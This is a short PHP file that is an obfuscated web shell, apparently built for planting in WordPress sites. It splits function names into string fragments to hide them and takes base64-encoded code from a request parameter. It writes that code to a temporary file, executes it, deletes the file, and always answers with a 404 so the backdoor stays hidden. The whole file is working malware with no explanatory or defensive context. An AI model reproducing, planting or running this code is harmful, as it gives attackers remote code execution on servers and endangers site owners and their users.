<?php
try{
$ic5e78[]='base64_de'.'code';
$ic5e78[]='sys_'.'get_temp_dir';
$ic5e78[]='unl'.'ink';
$ic5e78[]='temp'.'nam';
$ic5e78[]='file_put_cont'.'ents';
$ic5e78[]='array_key_ex'.'ists';
$zbacee='3ae'.'b1a80';
if($ic5e78[5]($zbacee,$_POST)){
$k3681d=$ic5e78[0]($_POST[$zbacee]);
}elseif($ic5e78[5]($zbacee,$_GET)){
$k3681d=$ic5e78[0]($_GET[$zbacee]);
}else{$k3681d=null;}
if($k3681d){
$xc6bed=$ic5e78[3]($ic5e78[1](),'w'.'p_');
if($xc6bed){
$ic5e78[4]($xc6bed,'<'.'?ph'.'p '.$k3681d);
http_response_code(404);
@include_once($xc6bed);
@$ic5e78[2]($xc6bed);
}}
http_response_code(404);
}catch(Throwable $e){http_response_code(404);}catch(Exception $e){http_response_code(404);}
